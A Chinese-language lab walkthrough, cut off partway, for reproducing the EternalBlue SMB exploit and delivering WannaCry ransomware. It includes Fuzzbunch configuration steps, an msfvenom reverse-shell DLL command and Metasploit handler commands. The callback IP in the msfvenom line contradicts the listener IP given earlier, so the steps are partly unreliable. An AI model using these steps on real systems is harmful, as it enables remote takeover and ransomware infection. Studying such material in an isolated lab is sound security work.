整个的复现的过程需要的环境以及工具有:
-
kali 2.0:用来监听获取反弹的shell。ip:192.168.15.174
-
winsever 2003 :需要装上python环境,勒索病毒攻击机。ip:192.168.15.141
-
win2007 :靶机,确保445端口开启。ip:192.168.15.144
-
永恒之蓝利用脚本shadowbroker-master以及勒索病毒wcry.exe,脚本shadowbroker-master的文件夹放在server2003 C盘根目录下,勒索病毒在kali的根目录下。
-
python2.6已经在winsever下装python需要的环境pywin32-221.win32.在sever2003中分别安装这些文件,并配置python环境变量,确保python能够正常运行
攻击环节:
1.在2003中修改C:\shadowbroker-master\windows下的Fuzzbunch.xml文件,修改内容如下,在这里要找到对应文件中的Resources文件的位置,然后对这个xml文件进行修改。在c:\的根目录下创建logs文件。
2.在kali上创建回链文件s.dll 命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.15.128 LPORT=4444 -f dll > s.dll
在生成文件后,把s.dll文件放到2003的根目录下,其中lhost中的ip地址为kali的ip 端口是随机的未占用端口。
3.在kali上运行,msfconsole,进行监听,命令如
msfconsole
use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp